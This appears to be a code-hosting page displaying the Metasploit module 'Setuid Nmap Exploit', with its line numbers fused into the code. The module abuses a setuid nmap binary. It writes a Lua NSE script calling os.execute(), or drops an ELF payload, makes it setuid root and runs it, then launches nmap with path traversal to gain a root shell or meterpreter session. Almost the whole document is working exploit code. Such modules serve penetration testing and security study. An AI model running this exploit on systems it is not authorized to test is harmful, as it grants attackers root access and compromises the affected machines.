Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/local/setuid_nmap.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Exploit::EXE9include Msf::Post::File1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Setuid Nmap Exploit',16'Description' => %q{17Nmap's man page mentions that "Nmap should never be installed with18special privileges (e.g. suid root) for security reasons.." and19specifically avoids making any of its binaries setuid during20installation. Nevertheless, administrators sometimes feel the need21to do insecure things. This module abuses a setuid nmap binary by22writing out a lua nse script containing a call to os.execute().2324Note that modern interpreters will refuse to run scripts on the25command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}26payloads will most likely not work.27},28'License' => MSF_LICENSE,29'Author' => [ 'egypt' ],30'DisclosureDate' => '2012-07-19',31'Platform' => %w[bsd linux unix],32'Arch' => [ ARCH_CMD, ARCH_X86 ],33'SessionTypes' => [ 'shell', 'meterpreter' ],34'Targets' => [35[ 'Command payload', { 'Arch' => ARCH_CMD } ],36[ 'Linux x86', { 'Arch' => ARCH_X86 } ],37[ 'BSD x86', { 'Arch' => ARCH_X86 } ],38],39'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },40'Notes' => {41'Reliability' => [ REPEATABLE_SESSION ],42'Stability' => [ CRASH_SAFE ],43'SideEffects' => [ ARTIFACTS_ON_DISK ]44},45'DefaultTarget' => 046)47)48register_options([49# These are not OptPath becuase it's a *remote* path50OptString.new('Nmap', [ true, 'Path to setuid nmap executable', '/usr/bin/nmap' ]),51OptString.new('ExtraArgs', [ false, 'Extra arguments to pass to Nmap (e.g. --datadir)', '' ]),52])53register_advanced_options [54OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])55]56end5758def nmap59datastore['Nmap']60end6162def check63return CheckCode::Safe("#{nmap} file not found") unless file? nmap64return CheckCode::Safe("#{nmap} is not setuid") unless setuid? nmap6566CheckCode::Vulnerable("#{nmap} is setuid")67end6869def exploit70if (target.arch.include? ARCH_CMD)71p = payload.encoded.gsub(/([$"])/) { |_m| "\\#{Regexp.last_match(1)}" }72evil_lua = %{ os.execute("#{p} &") }73else74exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.elf"75print_status("Dropping executable #{exe_file}")76write_file(exe_file, generate_payload_exe)77evil_lua = %{78os.execute("chown root:root #{exe_file}");79os.execute("chmod 6700 #{exe_file}");80os.execute("#{exe_file} &");81os.execute("rm -f #{exe_file}");82}83end84lua_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.nse"85print_status("Dropping lua #{lua_file}")86write_file(lua_file, evil_lua)8788print_status("Running #{lua_file} with Nmap")8990scriptname = lua_file91if (lua_file[0, 1] == '/')92# Versions before 4.51BETA (December 2007) only accept relative paths for script names93# Figure 10 up-directory traversals is enough.94scriptname = ('../' * 10) + lua_file[1..]95end9697begin98# Versions before 4.75 (August 2008) will not run scripts without a port scan99result = cmd_exec "#{nmap} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"100vprint_status(result)101ensure102rm_f(lua_file, exe_file)103end104end105end106107108